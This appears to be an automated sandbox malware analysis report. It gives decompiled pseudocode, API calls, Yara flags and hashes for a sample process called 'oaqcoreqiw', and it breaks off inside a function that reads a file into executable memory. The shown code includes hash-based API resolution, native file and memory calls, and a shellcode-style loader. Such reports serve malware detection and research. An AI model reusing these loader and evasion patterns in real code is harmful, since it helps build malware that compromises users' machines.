                                                  • Instruction ID: b49655052fe9c2941dbecb5d08ad187e3ec53c803f59393c59de2416dba0f359
                                                  • Opcode Fuzzy Hash: 7ac7f67495ec194942098bc58d9c9eede84a3723049a816becf9cb66fe3169b6
                                                  • Instruction Fuzzy Hash: 2731C131600247EFEB218EB8C894BAE7FF9FF45360F558568E5A59B191D730E850CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E010A1810(struct HDC__* __ecx, RECT* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                  				struct HDC__* _v8;
                                                  				struct tagSIZE _v16;
                                                  				int _t16;
                                                  				WCHAR* _t23;
                                                  				RECT* _t25;
                                                  				RECT* _t26;
                                                  				struct HDC__* _t27;
                                                  				int _t29;
                                                  
                                                  				_t25 = __edx;
                                                  				_t23 = _a12;
                                                  				_t27 = __ecx;
                                                  				_t26 = __edx;
                                                  				_v8 = __ecx;
                                                  				GetTextExtentPoint32W(_t27, _t23, lstrlenW(_t23),  &_v16);
                                                  				if(_a4 != 0) {
                                                  					if(_a8 == 0) {
                                                  						_t29 = _t26->bottom - _v16.cy;
                                                  					} else {
                                                  						_t29 = _t26->top;
                                                  					}
                                                  					_t16 = lstrlenW(_t23);
                                                  					asm("cdq");
                                                  					ExtTextOutW(_v8, _t26->right - _v16.cx + _t26->left - _t25 >> 1, _t29, 4, _t26, _t23, _t16, 0);
                                                  				}
                                                  				return 1;
                                                  			}












                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?), ref: 010A1828
                                                  • GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 010A1831
                                                  • lstrlenW.KERNEL32(?,00000000,?,?,00000000), ref: 010A1851
                                                  • ExtTextOutW.GDI32(?,00000000,00000000,00000004,?,?,00000000), ref: 010A186E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Textlstrlen$ExtentPoint32
                                                  • String ID:
                                                  • API String ID: 2058588642-0
                                                  • Opcode ID: 09a6487e9bdddacc0f03d78b5392d09b9b48bde00e051175bd5cae20706e7a80
                                                  • Instruction ID: 360c2803d978ae15fa74da46ae6a3cabf60c1f617d5ce8d8e611597d8887fc36
                                                  • Opcode Fuzzy Hash: 09a6487e9bdddacc0f03d78b5392d09b9b48bde00e051175bd5cae20706e7a80
                                                  • Instruction Fuzzy Hash: 3B015E72900114BFE7109E9CDD88FEEBBBCEB49310F448155FA58E3144C735A950CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 41e7cd-41e810 call 41f243 NtAllocateVirtualMemory
                                                  C-Code - Quality: 100%
                                                  			E0041E7CD(void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
                                                  				intOrPtr _v0;
                                                  				long _t14;
                                                  
                                                  				_t10 = _v0;
                                                  				E0041F243( *((intOrPtr*)(_v0 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x30);
                                                  				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                  				return _t14;
                                                  			}






                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID: ($
                                                  • API String ID: 2167126740-1917586925
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 176 41e5ed-41e5f1 177 41e5f3-41e644 call 41f243 NtCreateFile 176->177 178 41e5b5-41e5ec call 41f243 176->178
                                                  C-Code - Quality: 60%
                                                  			E0041E5ED(char __ecx, char* __edx, void* __eflags, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                  				intOrPtr* __esi;
                                                  				void* __ebp;
                                                  				void* _t35;
                                                  				intOrPtr* _t36;
                                                  
                                                  				asm("out 0x1e, eax");
                                                  				 *__edx = __ecx;
                                                  				if(__eflags > 0) {
                                                  					asm("in al, dx");
                                                  					_t23 = _a8;
                                                  					_t3 = _t23 + 0xa68; // 0xa90
                                                  					_t36 = _t3;
                                                  					E0041F243(_a8[5], _t23, _t36, _a8[5], 0, 0x27);
                                                  					return  *((intOrPtr*)( *_t36))(_a12, _a16, _a20, _a24, _a28, _t35);
                                                  				} else {
                                                  					__ebp = __esp;
                                                  					__eax = _a4;
                                                  					__ecx =  *((intOrPtr*)(__eax + 0x14));
                                                  					_t11 = __eax + 0xa6c; // 0xa6c
                                                  					__esi = _t11;
                                                  					__eax = E0041F243( *((intOrPtr*)(__eax + 0x14)), __eax, __esi,  *((intOrPtr*)(__eax + 0x14)), 0, 0x28);
                                                  					__edx = _a48;
                                                  					__eax = _a44;
                                                  					__ecx = _a40;
                                                  					__edx = _a36;
                                                  					__eax = _a32;
                                                  					__ecx = _a28;
                                                  					__edx = _a24;
                                                  					__eax = _a20;
                                                  					__ecx = _a16;
                                                  					__edx = _a12;
                                                  					__eax = _a8;
                                                  					__ecx =  *__esi;
                                                  					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                  					__esi = __esi;
                                                  					__ebp = __ebp;
                                                  					return __eax;
                                                  				}
                                                  			}








                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 200 40cf23-40cf3f 201 40cf47-40cf4c 200->201 202 40cf42 call 420f13 200->202 203 40cf52-40cf60 call 421433 201->203 204 40cf4e-40cf51 201->204 202->201 207 40cf70-40cf81 call 41f7b3 203->207 208 40cf62-40cf6d call 4216b3 203->208 213 40cf83-40cf97 LdrLoadDll 207->213 214 40cf9a-40cf9d 207->214 208->207 213->214
                                                  C-Code - Quality: 100%
                                                  			E0040CF23(void* __eflags, void* _a4, intOrPtr _a8) {
                                                  				char* _v8;
                                                  				struct _EXCEPTION_RECORD _v12;
                                                  				struct _OBJDIR_INFORMATION _v16;
                                                  				char _v536;
                                                  				void* _t15;
                                                  				struct _OBJDIR_INFORMATION _t17;
                                                  				struct _OBJDIR_INFORMATION _t18;
                                                  				void* _t30;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  
                                                  				_t24 = _a8;
                                                  				_v8 =  &_v536;
                                                  				_t15 = E00420F13( &_v12, 0x104, _a8);
                                                  				_t31 = _t30 + 0xc;
                                                  				if(_t15 != 0) {
                                                  					_t17 = E00421433(_v8, _t24, __eflags, _v8);
                                                  					_t32 = _t31 + 4;
                                                  					__eflags = _t17;
                                                  					if(_t17 != 0) {
                                                  						E004216B3( &_v12, 0);
                                                  						_t32 = _t32 + 8;
                                                  					}
                                                  					_t18 = E0041F7B3(_v8);
                                                  					_v16 = _t18;
                                                  					__eflags = _t18;
                                                  					if(_t18 == 0) {
                                                  						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                  						return _v16;
                                                  					}
                                                  					return _t18;
                                                  				} else {
                                                  					return _t15;
                                                  				}
                                                  			}














                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF95
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 215 41e69d-41e6a1 216 41e6a3-41e6ec call 41f243 NtReadFile 215->216 217 41e6ed-41e6ef 215->217
                                                  APIs
                                                  • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 220 41e5f3-41e644 call 41f243 NtCreateFile
                                                  C-Code - Quality: 100%
                                                  			E0041E5F3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                  				long _t21;
                                                  
                                                  				_t3 = _a4 + 0xa6c; // 0xa6c
                                                  				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                  				return _t21;
                                                  			}





                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 223 41e6a3-41e6ec call 41f243 NtReadFile
                                                  C-Code - Quality: 37%
                                                  			E0041E6A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                  				void* _t18;
                                                  				intOrPtr* _t27;
                                                  
                                                  				_t3 = _a4 + 0xa74; // 0xa76
                                                  				_t27 = _t3;
                                                  				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
                                                  				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                  				return _t18;
                                                  			}






                                                  APIs
                                                  • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 226 41e7d3-41e7e9 227 41e7ef-41e810 NtAllocateVirtualMemory 226->227 228 41e7ea call 41f243 226->228 228->227
                                                  C-Code - Quality: 100%
                                                  			E0041E7D3(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                  				long _t14;
                                                  
                                                  				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                  				return _t14;
                                                  			}





                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0041E723(intOrPtr _a4, void* _a8) {
                                                  				long _t8;
                                                  
                                                  				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                  				_t8 = NtClose(_a8); // executed
                                                  				return _t8;
                                                  			}





                                                  APIs
                                                  • NtClose.NTDLL(00410328,00000000,?,00410328,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E748
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3 41e943-41e96f call 41f243 ExitProcess
                                                  C-Code - Quality: 100%
                                                  			E0041E943(intOrPtr _a4, int _a8) {
                                                  
                                                  				_t5 = _a4;
                                                  				E0041F243( *((intOrPtr*)(_a4 + 0x164)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x164)), 0, 0x36);
                                                  				ExitProcess(_a8);
                                                  			}




                                                  APIs
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID: w5@
                                                  • API String ID: 621844428-2048009441
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 21%
                                                  			E0041E935() {
                                                  
                                                  				asm("daa");
                                                  				asm("int 0xa2");
                                                  				asm("loope 0xffffff9e");
                                                  				asm("stc");
                                                  				_push(0x9f547df3);
                                                  				_t7 =  *0xFFFFFFFF8BEC8B5D;
                                                  				E0041F243( *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), _t7, _t7 + 0xaa8,  *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), 0, 0x36);
                                                  				ExitProcess( *0xFFFFFFFF8BEC8B61);
                                                  			}




                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateExitHeapProcess
                                                  • String ID:
                                                  • API String ID: 1054155344-0
                                                  • Opcode ID: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                  • Instruction ID: cf9cc797f96d59935dff7869ae2ce17e4b40744dbe2bb0b75c86a5cc178cc62b
                                                  • Opcode Fuzzy Hash: d9de683a8bfab9e82bb086d4083715190b7a9b1252d4d09981e748e756a53aaf
                                                  • Instruction Fuzzy Hash: 5EF024B8A041006BC710DBA4CC85ED33BA8EF85204F144499BC980B202C179E91583F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 84%
                                                  			E004098A3(void* __eflags, intOrPtr _a4, long _a8) {
                                                  				char _v67;
                                                  				char _v68;
                                                  				void* _t13;
                                                  				int _t15;
                                                  				long _t25;
                                                  				int _t27;
                                                  				void* _t28;
                                                  				void* _t32;
                                                  
                                                  				_t32 = __eflags;
                                                  				_v68 = 0;
                                                  				E00420213( &_v67, 0, 0x3f);
                                                  				E00420CC3( &_v68, 3);
                                                  				_t19 = _a4;
                                                  				_t13 = E0040CF23(_t32, _a4 + 0x20,  &_v68); // executed
                                                  				_t15 = E00419603(_a4 + 0x20, _t13, 0, 0, E00402E13(0x2ef2527b));
                                                  				_t27 = _t15;
                                                  				if(_t27 != 0) {
                                                  					_t25 = _a8;
                                                  					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
                                                  					if(_t15 == 0) {
                                                  						return  *_t27(_t25, 0x8003, _t28 + (E0040C5F3(1, 8, _t19 + 0x540) & 0x000000ff) - 0x40, _t15);
                                                  					}
                                                  				}
                                                  				return _t15;
                                                  			}












                                                  APIs
                                                  • PostThreadMessageW.USER32(000072B1,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409906
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                  • Instruction ID: 8f2db9fe8dd4293e769d4f79dd02f83159bb7ad0b88680d8187a7f3a5710d2c7
                                                  • Opcode Fuzzy Hash: 8c8e9f467bb6879c5a8c78f1d0dc2f5625c34b38545da03a8c9cbc3b65211247
                                                  • Instruction Fuzzy Hash: 6C019B71A4022876E720A695DC82FEF775C9B45B54F14012DFB047A2C2D6A8AD0647F9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 229 41e8f5-41e901 230 41e930-41e934 RtlFreeHeap 229->230 231 41e903-41e91a call 41f243 229->231 233 41e91f-41e92f 231->233 233->230
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                  • Instruction ID: 1f4064dec4080926383eea4deb29f94a4842a973331a5e3ad2f339e89f1cfb14
                                                  • Opcode Fuzzy Hash: 55a0592ddd3e87e94e10c422cadf91ba0204797f2d40f8ce93b3a82e1634df7f
                                                  • Instruction Fuzzy Hash: A9F085B5210208ABCB18EF89CC48EA777A8EF88310F004959F90967252C634FA05CAA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 239 41e8c3-41e8f4 call 41f243 RtlAllocateHeap
                                                  C-Code - Quality: 100%
                                                  			E0041E8C3(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                  				void* _t10;
                                                  
                                                  				_t3 = _a4 + 0xa9c; // 0xa9c
                                                  				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                  				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                  				return _t10;
                                                  			}





                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00418CB9,?,00419460,00419460,?,00418CB9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8F0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                  • Instruction ID: 54a437fc11085ca12ae2a9f31c46b1b25ee2b1612e845e8a2c08afeac8ca904d
                                                  • Opcode Fuzzy Hash: f17a861d9ed32d2812970187304d035b903240b31c6816d5bb72975ed103bc71
                                                  • Instruction Fuzzy Hash: 67E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C670F914CAF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 234 4100a3-4100bc 235 4100c2-4100c7 234->235 236 4100bd call 419603 234->236 237 4100c9-4100ca 235->237 238 4100cb-4100dc GetUserGeoID 235->238 236->235
                                                  C-Code - Quality: 37%
                                                  			E004100A3(intOrPtr _a4) {
                                                  				intOrPtr* _t7;
                                                  				void* _t8;
                                                  
                                                  				_t7 = E00419603(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
                                                  				if(_t7 != 0) {
                                                  					_t8 =  *_t7(0x10); // executed
                                                  					return 0 | _t8 == 0x000000f1;
                                                  				} else {
                                                  					return _t7;
                                                  				}
                                                  			}






                                                  APIs
                                                  • GetUserGeoID.KERNELBASE(00000010), ref: 004100CD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: User
                                                  • String ID:
                                                  • API String ID: 765557111-0
                                                  • Opcode ID: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                  • Instruction ID: c28064bcec0e87ed17199b1c401a6025e046bcfeae29810ee43e910d84b218be
                                                  • Opcode Fuzzy Hash: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                  • Instruction Fuzzy Hash: AAE0C27368030426F72091A59C86FA6364E5B84B00F088475F90CD72C2D598E8C01024
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                  • Instruction ID: 7d567fb0b9b374d2fcadea76b5f186a9fefaaa7f04dd58c50085a667477643af
                                                  • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                  • Instruction Fuzzy Hash: E8E012B5600208ABCB14EF89DC49EA737ACAF88754F018059BA095B282C670E914CAB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0041EA63(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                  				int _t10;
                                                  
                                                  				E0041F243( *((intOrPtr*)(_a4 + 0x2f8)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x2f8)), 0, 0x46);
                                                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                  				return _t10;
                                                  			}





                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEF5,0040FEF5,?,00000000,?,?), ref: 0041EA93
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                  • Instruction ID: 441ee85fda3589afd26e41ae61f19a3667434cbc207aca3ddcc64c5dc7615bd2
                                                  • Opcode Fuzzy Hash: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                  • Instruction Fuzzy Hash: 13E01AB56002046BC710DF89CC45EE777ADAF88654F014165BA0857242C675E9548AB5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E010A28A0(void* __edx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12, int _a16) {
                                                  				struct _WNDCLASSEXW _v52;
                                                  				struct tagMONITORINFO _v100;
                                                  				struct tagMSG _v128;
                                                  				struct HACCEL__* _v132;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t38;
                                                  				char* _t47;
                                                  				int _t49;
                                                  				struct HMONITOR__* _t54;
                                                  				int _t62;
                                                  				int _t65;
                                                  				int _t67;
                                                  				int _t69;
                                                  				void* _t78;
                                                  				void* _t80;
                                                  				intOrPtr* _t81;
                                                  				int _t85;
                                                  				void* _t92;
                                                  				long _t93;
                                                  				struct HINSTANCE__* _t94;
                                                  				void* _t99;
                                                  				signed int _t100;
                                                  
                                                  				_push(_t80);
                                                  				_push(_t92);
                                                  				_t38 = E010A3542(_a12, "rb");
                                                  				_push(2);
                                                  				_t99 = _t38;
                                                  				_push(0);
                                                  				_push(_t99);
                                                  				E010A3C76(_t80, __edx, _t92, _t99, __eflags);
                                                  				_push(_t99);
                                                  				_t93 = E010A3B7F(_t80, __edx, _t92, _t99, __eflags);
                                                  				_push(0);
                                                  				_push(0);
                                                  				_push(_t99);
                                                  				E010A3C76(_t80, __edx, _t93, _t99, __eflags);
                                                  				_t81 = VirtualAlloc(0, _t93, 0x3000, 0x40);
                                                  				E010A377A(_t81, _t93, 1, _t99);
                                                  				_t100 = 0;
                                                  				if(_t93 != 0) {
                                                  					do {
